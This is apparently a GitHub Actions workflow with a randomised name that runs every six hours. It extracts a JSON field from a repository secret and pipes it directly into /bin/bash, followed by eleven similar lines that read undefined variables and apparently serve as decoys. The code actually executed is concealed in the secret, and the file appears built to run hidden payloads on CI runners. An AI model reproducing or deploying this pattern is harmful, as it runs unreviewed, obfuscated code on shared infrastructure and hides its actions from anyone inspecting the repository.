name: gucaishen4627

on:
  workflow_dispatch:
  schedule:
    - cron: '57 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gucaishen4627
        env:
          f6: ${{ secrets.f6 }}
        run: |
          echo $f6 | jq -r .bnwc3 | /bin/bash
          echo $kms3926 | jq -r .dit24377 | /bin/bash
          echo $uyx589 | jq -r .dq89 | /bin/bash
          echo $npl42173 | jq -r .dzitg8 | /bin/bash
          echo $msnae75397 | jq -r .jvdl8 | /bin/bash
          echo $qjmn374 | jq -r .cpq32 | /bin/bash
          echo $zmq2 | jq -r .c9 | /bin/bash
          echo $znk79558 | jq -r .kebdz00330 | /bin/bash
          echo $pnm71976 | jq -r .cib75056 | /bin/bash
          echo $ybsvy21 | jq -r .y57 | /bin/bash
          echo $y73 | jq -r .o5 | /bin/bash
          echo $pzue6429 | jq -r .x101 | /bin/bash

